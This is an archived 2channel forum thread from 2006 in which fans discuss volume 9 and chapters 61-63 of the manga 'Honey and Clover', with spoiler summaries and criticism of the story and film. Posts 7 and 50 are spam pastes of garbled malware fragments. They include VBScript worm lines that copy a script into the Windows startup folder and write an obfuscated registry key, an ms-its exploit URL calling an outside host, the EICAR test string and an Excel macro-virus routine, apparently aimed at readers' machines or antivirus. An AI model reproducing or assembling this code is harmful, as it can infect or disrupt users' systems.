5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

羽海野チカ「ハチミツとクローバー」その46

1 :花と名無しさん:2006/07/16(日) 08:47:38 ID:???0

◆ コミックス第9巻・・・・・・・・・7月14日(金)発売 ◆
◆ アニメ第2部・・・・・・・・・・・・6月29日(木)〜放送中 ◆
◆ 映画・・・・・・・・・・・・・・・・・7月22日(土)上映開始 ◆

      ※アニメ,映画の話題はそれぞれ専用のスレがあるのでそちらでどうぞ(>>2-3参照)※


★ このスレはsage進行です ※メール欄に半角で「 sage 」と記入。これ重要※

★ 荒らし・煽りは完全無視 ※反応するアナタも同罪です。これ常識※

★ 風紀もほどほどに ※話題の流れを変えたかったら自分から別の話題を投下する。これ鉄則※


≪前スレ≫
羽海野チカ「ハチミツとクローバー」その45
http://comic6.2ch.net/test/read.cgi/gcomic/1152552650/


関連スレ,頻出質問事項等は>>2-3あたりに

2 :花と名無しさん:2006/07/16(日) 08:49:41 ID:???0

≪関連スレ≫
ハチミツとクローバーアンチスレ
http://comic6.2ch.net/test/read.cgi/csaloon/1146626902 (漫画サロン板に移転)
ハチミツとクローバー II chapter.1 【ハチクロ】
http://anime.2ch.net/test/read.cgi/anime/1151415452 (アニメ板)
【櫻井翔】ハチミツとクローバー2冊目【蒼井優】
http://tv8.2ch.net/test/read.cgi/cinema/1149597898 (映画作品・映画人板) 

≪公式サイト≫
ハチクロ連載中コミック誌「コーラス」
h ttp://chorus.shueisha.co.jp
作者(羽海野チカ)
h ttp://www13.plala.or.jp/umino
アニメ
h ttp://www.hachikuro.net
映画
h ttp://hachikuro.jp

≪頻出質問事項≫
Q.花本はぐみは、花本修司の姪ですよね?
A.違います。花本修司のいとこの娘です。   ※映画でのみ「姪」設定となっています

Q.登場キャラクターの身長の設定はどうなってますか?
A.[はぐ 145cm][山田 167cm][竹本 174cm][森田 179cm][真山 181〜182cm]

3 :花と名無しさん:2006/07/16(日) 08:53:51 ID:???0
関連スレ訂正

ハチミツとクローバー II chapter.2 【ハチクロ】
http://anime.2ch.net/test/read.cgi/anime/1152568435/ (アニメ板)

4 :花と名無しさん:2006/07/16(日) 09:04:24 ID:???0
頭文字U

5 :花と名無しさん:2006/07/16(日) 09:52:29 ID:???O
9巻見た
はぐの中学の時の描写でなんか泣きかけた・・・
やっぱ この人心理描写 うますぎ
あと 森田兄弟の話を見て
はぐは絶対森田と一緒になっちゃいけないと思った
どんな理由でも人の人生奪っちゃったんだもの・・・それがなかったらまだよかったんだが
幸せになれないよ森田とはぐが一緒になっても


6 :花と名無しさん:2006/07/16(日) 09:53:10 ID:???0
今までの過去ログを読みたい方は、こちらからどうぞ。
ttp://makimo.to:8000/cgi-bin/search/search.cgi?q=%89H%8AC%96%EC%83%60%83J&sf=2&andor=AND&H=&view=table&all=on
(肉ちゃんねるのリンクです。
 時間帯や日によっては繋がらないこともあります)


7 :<body onload=window()>:2006/07/16(日) 09:53:53 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

8 :花と名無しさん:2006/07/16(日) 09:55:28 ID:???0
>>5
まあ、でも、森田話は10巻を読んでから考えよう。
後でまたちょっとあるから。

9 :chapter61:2006/07/16(日) 10:03:38 ID:???0
抱き合っている森田とはぐ

 これ以上ない やさしい言葉が彼の口からこぼれる
 やさしくて やさしくて なんてかなしい声−−−まるで
 どこか遠い所へ呼びかけているような
 だって初めて聴いた このひとの こんな 声

どうしたの?何があったのと森田に問うはぐ。

場面変わって、はぐを捜している修と竹本。
修は多分森田と一緒だからと捜すのをやめて
竹本と共に研究室に行く。
引越しするのか荷物がまとめてある部屋に驚く竹本。
修ははぐには何もいわずリハビリのために大学をとりあえず3年休職するつもりだった。
ギリギリで王子様(森田)が帰ってきたんではぐが森田を選んだら
世界中でも旅にでも出るかなとちょっと寂しげ。
なぜ「オレを選べ」とはぐに言わないのか、
自分はダメもとで言ったのにと竹本。
場を濁して病院へ行く修。

10 :chapter61:2006/07/16(日) 10:04:35 ID:???0
再び森田とはぐ。(普通に寄り添って寝てます)
手の異変に目が覚めるはぐ、腫れてるので病院へ戻ると。
止める森田に
「戻らないと手が死んじゃう、それだけはいや、絶対にだめ、
描けなくなったら私も死ぬ」
病院に戻った二人。修が待ち構えていた。

手の処置後、はぐの病室の窓から森田がやってくる。
修に殴られて頬に殴られたあとがある。
「・・・ごめんね・・・」
「なんでおまえが謝る?」
「・・・」
「・・・そっか・・・お前決めたんだな」
「見てて治すから 絶対に治すから ううん治らなくても
何も残せなかったとしてもいいの わかったの 
描きたいの これ以外の人生は私にはないの
夕べ言ってくれた事 ほんとにうれしかった 忘れないね
私もずっとあなたの事見てる
お兄さん見つかったら つかまえてちゃんと言うんだよ?
夕べ私に言ってくれた事 今度こそ大きな声で」

11 :chapter61:2006/07/16(日) 10:05:53 ID:???0
病院をあとにする森田、そこへ竹本。
先生に見つかったら殺されますよと言われ
すでに殴られて4倍返ししたけど
4倍どころかもっと殴っとけばよかったくらいだという森田。
察した竹本、森田を片付けられた修の研究室へ連れて行く。
「アイツは知ってんの?これ」
「『知らせるな』って『自分で決めて欲しい』って」
「そっか・・・ついに本気出して来やがったな あのおっさん・・・
捨て身かよ くそっ 勝てねーじゃねーか・・・」

はぐの病室に修が様子を見にくる。
はぐ、修の手を握りながら
「あのねお願いがあるの 修ちゃんの人生を私に下さい 
ごめんね 返せるかもわかんないのに こんな事言って でも
でも・・・私描きたいのずっと だから 一緒にいて 最後の最後まで」
まさかはぐから言われるとはと思わず力が抜けた修。
「ご、ごめんね い・・・嫌かな・・・」というはぐに修は微笑みながら
「いいよ・・・返さなくていいよ 全部やるよ」と。
涙ぐむはぐ。

そんな二人を知ってか知らずか心ここにあらずな森田と竹本。

12 :花と名無しさん:2006/07/16(日) 10:08:07 ID:???O
TSUTAYAで買えばなんか貰えるって聞いたが・・・なかったorz

>>8
そうなん?
10巻 来月でねえかなぁwW

13 :花と名無しさん:2006/07/16(日) 10:13:24 ID:???0
>>10-11
chapter62〜63のネタバレもキボン。

14 :chapter62:2006/07/16(日) 10:14:40 ID:???0
雨が好きだ 世界の輪郭がぼんやり煙って 私も一緒に吸い込まれそうになる

回想
幼いはぐ(小学生?)が修の家に遊びにくる。
東京から帰ってきていた修は部屋で畳の上で昼寝をしていた。
はぐは修にタオルケットをかけ、体育座りで寄り添い外の雨を見つめている。

雨の音が好きだ、すごく落ち着く、やさしく手当てしてもらってるみたい。
修ちゃんは雨に似ている。姿を見るだけでほっとする。いつだってやさしく手を差し伸べてくれた。
その手は温かかった。
いつのまにか体育座りしてたはぐは修とタオルケットを一緒にはおって寝ていた。

そうだ修ちゃんはきっと私の雨だ。一緒にいると深く息ができて草や木みたいに
ぐんぐん伸びてゆけそうな気がする。

目が覚めた入院中の病室のはぐ。付き添いの修がうつぶせで寝てしまっていた。
その修の頭を左手で抱き寄せる感じで触れるはぐ。

私のだいじな だいじな ひと 

15 :花と名無しさん:2006/07/16(日) 10:14:49 ID:???O
森田ぁあぁああああ!

16 :chapter62:2006/07/16(日) 10:16:01 ID:???0
場面変わって 森田と竹本がホームレスのごとく寝てしまい
目が覚める。時計を見ると5時。いつの5時?と言ってたが
朝日が昇ってきたので朝らしい。
川辺でコンビニで買ったものを食べながらその食べ物は俺のだと子供っぽい森田に対して
竹本ははぐはこんな男じゃなくて修を選んで正解、自分もくやしいけど考えたら
はぐを幸せにできるのは自分でも森田でもなく修なのだと。
カチンときた森田は竹本と取っ組み合いのケンカになる。
森田「とっくの前にフラれたお前に言われたくない。」
竹本「森田にだけはとられるのは嫌だった。
自分は金も才能も持ってない。どーせとられるならそういうのじゃなくて
優しさや誠実さにとられた方が気が楽。だからはぐが修を選んでくれてよかった。」

森田は才能のせいで人間関係がわずらわしくなっていたのでそういうのから逃げたかった。
だからはぐを道連れにしようとした。
修のほうがはぐを幸せにできるって事は自分にだって解っていた。
川辺で殴り合いをしていた二人だが老人ギャラリーが集まってきたのでやめて仲良く学校に戻る。

17 :chapter62:2006/07/16(日) 10:17:50 ID:???0
学校、研究室にて昨夜のはぐの病室での座り寝のせいで肩と腰が痛いと言ってる修。
物音がしたので廊下にでるとゆうパックサイズのダンボールがあり
開けるとぜったいに治してやれのメッセージが書かれてぎっしり札束が入っていた。
森田だと気づく修、窓を開けて外を歩いてる森田を見つけるやいなや
森田と叫びダンボールを森田に投げかえす。
正直助かる、有難く使わせてもらうと三束くらいの札束を手にした修はこのくらいで充分、
絶対に返すけど金は返すがはぐは返さんっという修。
カチンとした森田はこれで終わりと思うなよ覚えてろというが
修は覚えてる、絶対に治す、また描けるようになると返事する。
森田「・・・お前さ アイツの事好きなのか?」
修「ああ好きさ 大好きさ!!」
研究室に入ってきた山田はその会話をきいて驚く。
勿論、外にいた教授陣や生徒達にもまる聞こえです。
動揺する山田、恥ずかしさのあまりよろける修、
そして『忘れないね 私もずっとあなたの事みてる ずっと ずっと』と
はぐが言った言葉を胸に森田はその場を去る。(※学校に戻ってきたのは森田だけです。竹本は不明)

18 :花と名無しさん:2006/07/16(日) 10:18:08 ID:???0
>>9
chapter62も…

19 :chapter63:2006/07/16(日) 10:19:09 ID:???0
610  バレ [] 2006/06/27(火) 10:19:36 ID:nqF4m4rR0
臭はぐが手をつないでるのがラストのコマだったよ・・・今回。






山田に「先生も男だったんですね」みたいに言われて大テレの臭。
スペインから帰ってくる真山と理化さん。真山は「先生がこうなって
俺嬉しいよ」と男泣き、理化はからっぽになった臭の研究室(引越し前)で
「ここを、出て行くのね」と言い、ふたりはしんみり抱き合う。

山田「はぐちゃん森田さんすきなんだと思ってた」
野宮「そうだったんだろうけど…好きより大事なものがある価値観が
彼女にはあるんだよ。創作がうんぬんかんぬん。君だってあれだろ。
このスイッチ押せば真山が振り向く、というスイッチが目の前にあって
でもそれ押したら犬のリーダーが一生暗闇の中から出てこられないって
わかってたら押せるかい?」とポエムちっくなたとえ。
「たしかにそんなのできない」となんか泣いてる風の山田。
それを影から見てる美和子たち(野宮って実はMね、とか)。

森田実家はまたシアワセを買い戻せた模様?(あれはイメージシーン?
よくわからんかった)

粘土でリハビリしたりあゆにならってはとを作りたい(胸がふっくらしてて
すっと立ってるところが似てるから、とか、結構ここのネーム気持ち悪かった)
そして父と新しい母と赤ちゃんのためにも。
それを聞いた臭「赤ちゃんが生まれてくるまでに、きっと間に合うさ」

20 :花と名無しさん:2006/07/16(日) 10:26:31 ID:???0
あらすじ乙!

21 :花と名無しさん:2006/07/16(日) 10:28:57 ID:???0
乙でした!!

22 :花と名無しさん:2006/07/16(日) 10:30:54 ID:???0
森田背高ッ!!
はぐ小さッ!!

この2人が一緒に歩く所を見てみたいw


23 :花と名無しさん:2006/07/16(日) 10:31:02 ID:???0
コーラスでハチクロを初めて読んで、はまって
今までのコミックスを一気にそろえて
やっぱりイイ!と感動してた人が過去ログにいたけど
コーラス読者にはこの鬱展開は好評なのかね。
初期からハチクロを読んできた人には
違和感バリバリなんだけど…。

24 :花と名無しさん:2006/07/16(日) 10:50:41 ID:???0
まあはぐは典型的な少女漫画のヒロインのような
恋愛至上主義者ではなかったということよね
恋より自分の才能が大事なのだ

25 :花と名無しさん:2006/07/16(日) 10:54:57 ID:???0
あらすじ乙でした。
森田もはぐみや臭に触発されてなんか大作を作りそう。

26 :花と名無しさん:2006/07/16(日) 10:57:45 ID:???0
タケノコひでぇ…
今までのはぐや森田が才能で人間関係苦労してきた話を読んでからそんなこと言われるとなー
その辺はふれないでやってほしかった。一気に株下落。


27 :花と名無しさん:2006/07/16(日) 11:00:43 ID:???O
所詮漫画の世界なんだから作者の妄想好きに描けばいいんじゃない?
現実はそうはいかないから大丈夫だよ
いくら腐女子が上手いやおい描いても、ヒーローは完全無視で噂のあの娘と現実ではラブラブみたいなもん
現実は実は漫画よりファンタジックだしね
ところで笑う大天使みたけど面白かったー
漫画映画の当たり年だな
稲妻のシーンあるんだけど
丁度それみてる時、劇場の外プチ嵐で本当に雷おちてて笑ったw

28 :花と名無しさん:2006/07/16(日) 11:01:30 ID:???0
>>23
ヤングユーが廃刊になって
コーラスにハチクロが行くと知ったばかりの頃は
「コーラスもヤングユーも似たような雰囲気の漫画誌だから
 コーラスに行ってもハチクロは別に変わらないだろうな」
と私は思ってたんだけど
コーラスを読んでみたら、ヤングユーとは
似てるようで似てないんだよね…。

コーラスって、学校のいじめ問題とか、家族愛問題とか
どんな人間だって殺人者になる可能性はあるとか
泣いた赤鬼の童話に泣けなかったクールな女子高生とか
なんか問題提起みたいな漫画が多いイメージをもった。
ヤングユーのほうがもっとフワフワして甘い夢みたいな
漫画が多かったような気がする。

コーラスの問題提起漫画が好きな人には
鬱展開ハチクロにははまるんだろう。

29 :花と名無しさん:2006/07/16(日) 11:01:53 ID:???0
ああそう

30 :花と名無しさん:2006/07/16(日) 11:05:09 ID:???0
>>27
所詮漫画といえども、好きなように妄想描くのは同人でやって欲しい

31 :花と名無しさん:2006/07/16(日) 11:05:46 ID:???O
>>30
んだんだ。

32 :花と名無しさん:2006/07/16(日) 11:13:10 ID:???0
臭から見たはぐ=異性。ああ好きさ、大好きさ!
はぐから見た臭=自分が生きて行く(描き続ける)為の環境

33 :花と名無しさん:2006/07/16(日) 11:24:04 ID:???0
なるほど雑誌の雰囲気に合わせたと考えると、
それはそれでプロの仕事・・・・・なわけないですよ?

34 :花と名無しさん:2006/07/16(日) 11:27:15 ID:???0
クッキーに行ったほうが良かったのかな。

35 :花と名無しさん:2006/07/16(日) 11:29:51 ID:???O
同感。         クッキーの方が、雰囲気が合ってる。

36 :花と名無しさん:2006/07/16(日) 11:32:44 ID:???O
はぐは恋じゃなく芸術をとって、修を選んだ。これだけなら良い。
修の恋愛感情だけが蛇足。

37 :花と名無しさん:2006/07/16(日) 11:34:08 ID:???0
バレを見る限り、
竹本はすでに場外、森田ももはや手遅れって感じだな。
読者的には色々納得いかないのに登場人物たちが勝手に納得してて空しい。

38 :花と名無しさん:2006/07/16(日) 11:37:46 ID:???0
>>36
>私のだいじな だいじな ひと 
パグの感情にも恋愛混ぜようとしてないか、これ。
パグミまで顔赤くしだしたらほんと漫画に火を放つぞ!

39 :花と名無しさん:2006/07/16(日) 11:41:02 ID:???0
パグw

40 :花と名無しさん:2006/07/16(日) 11:47:36 ID:???O
>>37
真山のバカって感じだよ…

41 :花と名無しさん:2006/07/16(日) 12:16:20 ID:???0
真山もだが本人達もなんだかんだ言って諦めモードなのが悲しい。

42 :花と名無しさん:2006/07/16(日) 12:19:00 ID:???0
竹本はもうどうあがいても救いようが無い感じになってるけど、
森田に関しては、はぐの事故が会社事件の前または兄が帰ってきた後だったら…と思っちゃう。
ブルーな気分に任せて取り返しの付かない変なこと口走っちゃった感がいなめない。

43 :花と名無しさん:2006/07/16(日) 12:24:13 ID:???O
あのまま二人でどっか遠くへ行っちゃえばよかったのに

44 :花と名無しさん:2006/07/16(日) 12:26:03 ID:???0
心中でいいよ。でも森田だけ死んではぐは生き延びそう。

45 :花と名無しさん:2006/07/16(日) 12:32:55 ID:???0
どうでもいいけど山田困るだろうな
好きな人が励ましてくれたら元気でるかも☆
って森田を読んだら
森田ふられちゃうんだもんな
竹本に謝ってる場合じゃないような。

46 :花と名無しさん:2006/07/16(日) 12:51:45 ID:???0
森田ねぇ。結局奴がはぐみをまともな名前で呼ぶことは無かったな。

47 :花と名無しさん:2006/07/16(日) 12:51:46 ID:???0
どうでもいいけどタケノコはベルサイユ完成させたの?

48 :花と名無しさん:2006/07/16(日) 12:52:09 ID:???0
>>45
大切な人同士の恋愛なんて平等であってほしいもんだ。
だからこそ森田さんにもチャンスを与えた、みたいな?
修にはそんなはぐLOVEな感情が無いもんだと思ってたからね。

49 :花と名無しさん:2006/07/16(日) 12:56:00 ID:???0
>>47
忘れてたww
きっとまだでしょ。最近はそれどころじゃないし。
見舞いに完成させて持って行ってやれば株上がるかもw

50 :<body onload=window()>:2006/07/16(日) 12:58:29 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

51 :花と名無しさん:2006/07/16(日) 12:59:34 ID:???0
>>321
 宮大工のところに旅立つことになるのかなー。それを
 ホームで見送るハチクロ仲間。リカの部屋に帰る真山、
 野宮が車で待ってて隣に乗り込む山田、なんとなく
 残った森田がぎこちなくはぐの手をつないで、
 おしまい★
 最終回、こんな風になりそうな気もする。
 みんなばらばらはイヤだけど、子供の時間は終わったのだ
 みたいな風になるような。修ちゃんがタバコ吸ってて
 そこに新入生が来て「こうして時はめぐるのか」みたいな…

 寒い、書いてて。スマソ


これがヨカッタ(;∀;)


52 :花と名無しさん:2006/07/16(日) 12:59:46 ID:???0
>>28
>>33
YYもコーラスも読んでたけど、
問題提起はたまたま最近がその傾向なのが重なっただけで、
ハチクロの作風に影響させたほどのものでもないと思う
確かにふわふわした感じはないけどね
コーラスは骨太な感じがある

YYが休刊になった時はクッキーへ逝けって話があったよね
YYに来る時にもあった

53 :花と名無しさん:2006/07/16(日) 13:11:45 ID:???0
はぐと修ちゃんは結婚するの?

54 :花と名無しさん:2006/07/16(日) 13:25:38 ID:???0
>>53
それだけは本気でやめてほしい

55 :花と名無しさん:2006/07/16(日) 13:26:55 ID:???0
映画は大ヒットだね

56 :花と名無しさん:2006/07/16(日) 13:31:01 ID:???0
難しいんじゃないのかな?
信者には既に不評だし、一見にはドン引きするような内容の予感。

57 :花と名無しさん:2006/07/16(日) 13:33:51 ID:???0
でもレビューとか良さげだったけどね。監督もすごい自信満々みたいだし。>ハチクロ映画
スレチすまそ。

58 :花と名無しさん:2006/07/16(日) 13:34:34 ID:???0
映画?
上手いことヲタくささを取り除いてるきがする。
青春ラブ☆に焦点しぼってていいんじゃないか?
漫画がとっちらかってる分、きれいにまとめてほしい。



しかし桜井・・・

59 :花と名無しさん:2006/07/16(日) 13:47:02 ID:???0
桜井 桜井

60 :花と名無しさん:2006/07/16(日) 13:51:09 ID:???0
>>47
足組みの必要なでっかいもの作るのにはまっちゃったようだから
ちまちまとベルサイユ作ってるヒマはないんじゃね?

61 :花と名無しさん:2006/07/16(日) 13:53:14 ID:???0
桜井ね。。はぁ

62 :花と名無しさん:2006/07/16(日) 13:58:18 ID:MMcAru06O
10巻になって急にはぐの絵ヅラが大人びた感じになってるのもなんか嫌だ…
睫毛が長く斜め前髪で悲劇のヒロイン風。


アニメのスタッフと随分仲がよろしいようだがアニメの人達はウミノに何も
つっこまないのかな‥

63 :花と名無しさん:2006/07/16(日) 13:59:45 ID:???0
桜井、演技下手なの?
それとも、痛い役にアレンジされてたの?

映画や俳優に影響されやすいウミノのことだから
竹本が糞な奴になったのも
映画の桜井が糞だったせいなの?

64 :花と名無しさん:2006/07/16(日) 14:00:31 ID:???0
>>62
仲が良いから逆にマンセーしてるんじゃない?

65 :花と名無しさん:2006/07/16(日) 14:00:52 ID:???0
この頃ははぐみの身長まで急に伸びてたしなぁ。

66 :花と名無しさん:2006/07/16(日) 14:04:36 ID:???O
きっと成長期なんだ!
蒼井とか関係なくね!










はぐ二十歳越えてるけど。
…orz

67 :花と名無しさん:2006/07/16(日) 14:08:38 ID:???0
>>65
映画のはぐ役が160センチの大女だから、
これも映画に影響受けたんだろう。

68 :花と名無しさん:2006/07/16(日) 14:17:10 ID:8iWegQN2O
修も堺化したしな

69 :花と名無しさん:2006/07/16(日) 14:20:10 ID:???0
葵がどうのというより
話の展開上
臭の相手にふさわしい見た目に
徐々にかえてってるんだろう。

それにしてもモノローグでは私っていってんのに
セリフになると「はぐはねー」ってこいつ完全に計算だな。

70 :花と名無しさん:2006/07/16(日) 14:23:14 ID:???0
この作者しょっちゅう登場人物に「痩せた」って言わせてるね。
不幸好きの一つの表現方法?

71 :花と名無しさん:2006/07/16(日) 14:25:28 ID:???0
>それにしてもモノローグでは私っていってんのに
セリフになると「はぐはねー」ってこいつ完全に計算だな。

ワロタ

72 :花と名無しさん:2006/07/16(日) 14:31:37 ID:???0
>>70
そういや竹本も森田に言ってたし森田も竹本に言ってたね。

森田はわかるがはぐみは何で痩せたんだ。
食事もノドを通らないんだとしたら山田が料理持ってきたときの反応がおかしいよ。

73 :花と名無しさん:2006/07/16(日) 14:39:46 ID:???0
>>72
その辺は落ち着いてきた時期なんじゃない?
さすがにケガしてすぐは
そんな余裕がなかったんだよきっと。
まあハチクロ界では
夜中に特盛丼を2杯食べる山田があの体系だから
ものすごい勢いでカロリーが消費されるんだと思うよ。
うらやましいね☆

74 :花と名無しさん:2006/07/16(日) 14:41:55 ID:???0
鉄人は鉄人なので突っ込みは野暮です。

75 :花と名無しさん:2006/07/16(日) 14:42:04 ID:???0
>63
単に桜井より堺のほうが好みで萌えただけだと思うが。

76 :花と名無しさん:2006/07/16(日) 14:45:55 ID:???0
CMの桜井の「はぐちゃん・・・きみは・・・」がキモス
喋り方がデブキャラっぽく感じるんだが

77 :花と名無しさん:2006/07/16(日) 15:00:59 ID:???0
ジャニの文句言うと荒れるからやめれ

78 :花と名無しさん:2006/07/16(日) 15:04:10 ID:???0
ジャニがどうこうと言うより映画関連の感想とか批評批判は
ここじゃスレ違いだし。

79 :花と名無しさん:2006/07/16(日) 15:06:31 ID:???0
というわけで話を戻しますが

>>70
羽海野が痩せたいってことだろ。

80 :花と名無しさん:2006/07/16(日) 15:08:58 ID:???0
しかし映画萌えを漫画に持ち込んでるのはウミノのほうだしな。
映画に影響受けて漫画のストーリー変えてるのはウミノなんだから
映画の話がネタバレにならない程度に出るのは仕方ない。

81 :花と名無しさん:2006/07/16(日) 15:12:25 ID:???0
そうくるか。

82 :花と名無しさん:2006/07/16(日) 15:22:37 ID:???0
ウミノたんのせいでスレのモラルまで崩壊しましたよ?

83 :花と名無しさん:2006/07/16(日) 15:40:10 ID:???0
ウミノたんがマンガのモラルを破壊したからね…。

ウミノたんに苦情の手紙とか行ってないのかな。
それとも、編集者が検閲して
マンセーファンレター以外は
ウミノたんに渡していないのかもしれない。

84 :花と名無しさん:2006/07/16(日) 15:44:37 ID:???0
映画は原作終了してからやって欲しかったな
原作が影響されるとかありえない…

85 :花と名無しさん:2006/07/16(日) 15:47:43 ID:???0
修ちゃん・・・はぐはきもいの?

86 :花と名無しさん:2006/07/16(日) 15:49:05 ID:???0
キャストや声優の中の人で影響されるなんてありえない・・・

87 :花と名無しさん:2006/07/16(日) 15:52:02 ID:???O
ハグミとクローバー(修・森田・竹本)

88 :花と名無しさん:2006/07/16(日) 15:58:04 ID:???0
連載は読んでないコミックス派だけど
高校生の妹が先に読んで
「もう次読みたくない」とショック受けててあれれ?と思った。
初期のかわいいお話がどんどんドス黒く重たくなっていくのが耐えられないみたい。
確かにモカデミーの頃とはまったく別物ですよね。
アニメ1の最終回がハチクロの最終回と思おう。

89 :花と名無しさん:2006/07/16(日) 16:11:12 ID:???0
あらすじを読んでいろいろ納得。
しかし何で描くために修を一生単位で必要だというのか全然わかんねー。
腕力とか知識とかなんて別に専属で誰か居なくたってどうにか出来ると思うし
弱い心身の自分の保護者として必要ってこと?
でも描くってだけなら別にひとりぼっちの頃だって描いてたじゃん。
長くひとりで居るのはさみしいみたいなこと口にしちゃう山田が
保護者がいないと自分はだめとか言うならわかるけれど、
はぐがああいう判断するのは良く分からない。
依存が作者の中ではかなりロマンチックなものなんだろうけど、それで突き抜けられてもなあ。


90 :花と名無しさん:2006/07/16(日) 16:15:06 ID:???0
これから先もずっと絵を描いていきたいなら技術向上のためにも留学すればいいのに。


91 :花と名無しさん:2006/07/16(日) 16:20:18 ID:???0
はぐちゃんが絵を教える先生になる希ガス。それは無いですか?

92 :花と名無しさん:2006/07/16(日) 16:23:07 ID:???O
作中のキャラが「はぐちゃんは強い」ってよく言ってるけど、変に頑固というか何というかただそれだけな気がする

93 :花と名無しさん:2006/07/16(日) 16:29:19 ID:???0
>>89
まぁ、文章のネタバレだけじゃなく
ウミノの絵になったマンガを読むと
いろいろ納得どころか
破壊力抜群でスゴイよ??

竹本がものすごいどうでもいい顔(ブサイクでテキトーに描いた顔)に
なってたり、
(森田は、かっこいい表情の絵のコマが結構あった)
修が顔を赤らめてたり
修がはぐのことを「大好きさ!!」と言ったのを
聞いてしまった山田が
「キャー!!キャー!!*・゜゜・*:.。..。.:*・゜(n‘∀‘)η゜・*:.。. .。.:*・゜゜・」
と喜んでたり。

山田と竹本の人格崩壊っぷりがスゲェ。
特に竹本。人格崩壊+絵もザツでブサイクに描かれてるし。
今の竹本は本当に作者に愛されてないんだな。

94 :花と名無しさん:2006/07/16(日) 16:29:40 ID:???0
⊂二二二( ^ω^)二⊃ブーン

95 :花と名無しさん:2006/07/16(日) 16:32:34 ID:???0
chapter63 に関しては
一応振られた森田に関してはフォローはあった。

しかし竹本に関してはフォローなし。

竹本がはぐみに恋に落ちる瞬間を見てしまった真山も
修がはぐみを好きになったことを大絶賛して
竹本のことは完全に忘れてる。

96 :花と名無しさん:2006/07/16(日) 16:32:48 ID:???0
山田はほっぺがぷくぷくのロリ肉まんじゅうみたいになっててすっごく気持ちが悪かった。
竹村はいきなり性格が悪くなったので何が起こったのかとびっくりした。

97 :花と名無しさん:2006/07/16(日) 16:34:58 ID:???0
やっと他所で人間らしく生きられそうだったのに
またあてにしてた会社がつぶれちゃって
竹本が壊れて修を殺しちゃうのかも。
ぞんざいな扱いはその伏線とか。

98 :花と名無しさん:2006/07/16(日) 16:36:23 ID:???0
はぐの容姿が少し大人っぽくなってて、身長が伸びて
自分の意見もきちんと言うように描かれてて
山田が縮んで童顔になって
性格が幼稚化してたよね。

99 :花と名無しさん:2006/07/16(日) 17:05:22 ID:???O
初期の山田とはぐが混じって原型留めてない

100 :花と名無しさん:2006/07/16(日) 17:05:30 ID:/5dY/2B00
http://www.j-wave.co.jp/original/tokiohot100/guest/images/popup_246-1.jpg
作者の顔はっときます。

101 :花と名無しさん:2006/07/16(日) 17:12:37 ID:Jm22Nr3kO
おぉー!初めてみたw マイラジの?

102 :花と名無しさん:2006/07/16(日) 17:15:41 ID:???O
コミックス派で、本誌読んでないんだけど、
どのあたりから修ははぐを「恋愛感情」で好きになったの?
ずっと保護者としての愛じゃなかったの?
りかのこと好きじゃなかったの?


103 :花と名無しさん:2006/07/16(日) 17:17:00 ID:???0
>>102
それがわからないからこうなってる訳で

104 :花と名無しさん:2006/07/16(日) 17:25:51 ID:???O
>>103
おかげでちょっとした祭だよな。

105 :花と名無しさん:2006/07/16(日) 17:38:40 ID:???0
>>100
おー、ケロロみたいな顔だ。

106 :花と名無しさん:2006/07/16(日) 17:47:19 ID:???0
山田が皮ごと食べれるレッドグローブを持ってったところに優しさを感じた・・

107 :花と名無しさん:2006/07/16(日) 17:54:10 ID:???0
ここまでネタバレしちゃってるから思い切ってきくけど、

森田はお兄さんに内緒で
仕返しした相手の家族の幸せのために
自分達が昔住んでたのとそっくりな家を建てて
その家族に無料で貸すことにしたんだよね?
(それが>>19でイメージシーン?っていってることだよね?)

108 :花と名無しさん:2006/07/16(日) 18:15:09 ID:???0
修はぐと聞いて飛んできましたよ
9巻で思いっきり森田はぐエンドかな?って思ったのにw
修ちゃんかよ。ダークホースだぜ

109 :花と名無しさん:2006/07/16(日) 18:47:02 ID:???0
4巻あたりまで読んで、このひとはギャグとシリアスが分離しすぎてるな(特に森田)と
思っていたが、今日一気に9巻まで読んだらやっぱりアチャーって感じになってまつね。

110 :花と名無しさん:2006/07/16(日) 18:49:47 ID:???0
>>107
